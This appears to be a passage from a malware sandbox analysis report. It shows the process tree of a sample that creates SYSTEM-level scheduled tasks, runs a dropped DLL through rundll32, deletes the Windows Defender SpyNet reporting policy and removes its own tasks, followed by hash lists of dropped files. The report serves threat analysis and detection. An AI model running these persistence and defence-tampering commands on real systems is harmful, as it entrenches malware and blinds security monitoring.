PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SXVvvXCuCecgohx"3⤵PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SXVvvXCuCecgohx"3⤵PID:1248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EOkhxrYxAEIuAx" /F /xml "C:\Program Files (x86)\fCscXRmSsoZU2\qJbRMas.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PwfdYqkpoBAoU2" /F /xml "C:\ProgramData\NTslqXAyKxgJdOVB\OGmAEzP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sZntjluwdORXGerps2" /F /xml "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\nwKLwAG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hUZrJIygDlPKjnJiuVx2" /F /xml "C:\Program Files (x86)\yNjTJhHiELlhC\TBxtUHC.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZGhVhnWHpCkuylUXB" /SC once /ST 14:54:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xKkxXQQPSIyydVpo\CpxPTMFQ\GSOZKnl.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZGhVhnWHpCkuylUXB"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1868
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1724
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FFlCdDCQpdthnDzXV"3⤵PID:520
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\CpxPTMFQ\GSOZKnl.dll",#1 /site_id 5254032⤵PID:2032
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\CpxPTMFQ\GSOZKnl.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:584 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZGhVhnWHpCkuylUXB"4⤵PID:932
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1660
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-147673234973281133-175724194913371334686526758247610285914313603551335489545"1⤵
- Windows security bypass
PID:2032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:304
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5bac0f82666e03c5840ccecb0a3773273
SHA1272f97b5439d57e56092a3bae1459a8e9ada8fa7
SHA256fba5d4cc96ea5c8d2d0cd72bc9ce160e4f3f67773e8b513f19f7d89092ef19fd
SHA512cc68b563aecd617e0658b90b12207aa333e8210e80349611fc4fe264964cba0daac3b9b3c8ae0d2ebb532354db8b41da7eab6950db50c06f72ab701787061e8a
-
Filesize
2KB
MD5ff0033f66a948225ede0f35171284488
SHA1ce167e81a3038de49c9aefc1577a3c794ca8688d
SHA256f4e8de47005007ba4bc76f1e0ef348646bc04ba537cf0da19381684322230e2b
SHA5129dd638d7b99f48f7e9a584ef1492815aa20499dc69ff08b2d97c8a1e42fc38d11c74dc71c74062c543339feac513b4a8edd5fce10954b789f3910ae200b3c6f7
-
Filesize
2KB
MD5ba42f715ad12b1ac416472136f292aa4
SHA1c1313c3eae9cd7948da8b0fd27a484d4fa6dfeaf
SHA25625d3429728287a66e4713d2f1ae5213c17edb344dfdacbd43bcd04a9eb15cfaa
SHA512758478d04c08daee167fe5ca67166015e24908c5c3977e812b15d3367931fa085c56a4c9ab589e0b6a25334fdcfc53c04b45ffa73e9f45af6ec38ed1ef885202
-
Filesize
2KB
MD527e0f27b32243912d4edaa92b79f1096
SHA1f4d704b7bc0ebfd62d7cb39d8e17057df66c676a
SHA256a413a27bdb6e9b5b6508e11d89314d3b3681fe31991ec83c78fc42b4de4014d1
SHA5120819ef772456cae1b3177e572631734043adff6369b041dae0a8cb7c3cae1cd3230d6304d647b1df79f2b8a424fe998d0838f7971bdee41ade418a5746a8c33e
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5289bb2ca786ca5508afe7ae00b78a893
SHA13362bc4bf6a953960d9b71dcb6a36ef3a290b923
SHA256460f465a85929f9833817c3f70e44815190a4b6f4d3d86d834acd33e8639db09
SHA512fb5c11321c93b06bd165dbb0dd5b92fc4ec7b24734c200d2fa276ef21963e7ee4013de143b6a19c174f2455e81b020c332335d3383dbf60d016cf953e40a43fe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5548b73f6bb51cc49b39a28bcb50d268f
SHA1178bed365f712db76c997ae38e8f32617ec6f515
SHA256f47c5637d01087a0f7c9efef3edf947a383ff497fcfd60a991b3a20a877447b5
SHA5128cf0e7196b77964d9da9363bbeae4f88e54a9466242d302ab4daf2d3461aa13b1e2f18aa7fb3de3708668d6935d707a45bcf391b1d1765b9bd59e38d1a8910a1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD562a6257eb7261b7a639c2246afc7ac08
SHA1e07b0f8308b3934cc0f7e65fa4fc6d770d1cc6d4
SHA2564cc1f505915202b9fa54678241245015ac27695665d8c5310a92792cafe34434
SHA51209f845e43a0829462e46b02d8fa98a947672aceacd79315749c923047606212ff7c082467f30012abeb8eb0854cdd8ea14018fcc68befee07ba1abd8f7194a02
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
8KB
MD5c29f672ef02fbfb61af3ef3968834021
SHA197741fa3e96a57368d2dc6677562285d2093323c
SHA2565e8c2b454b507a8d13c30a0fda66688b76c0ac74fb32ec9e97fffc1dff3c3283
SHA512adbf938200b3abdf0e895818e25b904124122c366c8cd7154a8cbb187051eec311ad8343c4f9a95f033266aabf2fa98fe10ef00ec66a43407c192fc927a13637
-
Filesize
4KB
MD5a1283d938416b82e18d1c49057799ce4
SHA13a301c84c6eb70aa8c1321c458230a20495f48e4
SHA256f5f019e787ca2de48e6086b3316b8abd4225dcec71361c61d2461b0ab7044f95
SHA512fbcfc2ca47e8095b8c23835081ff766f5c3c7d8ac1b7586bd2d55ef0efa24f7ad3abece8c42762238cfce7c8ee896854a29cbd6ecf7628408bb9f58ab91f49d4
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a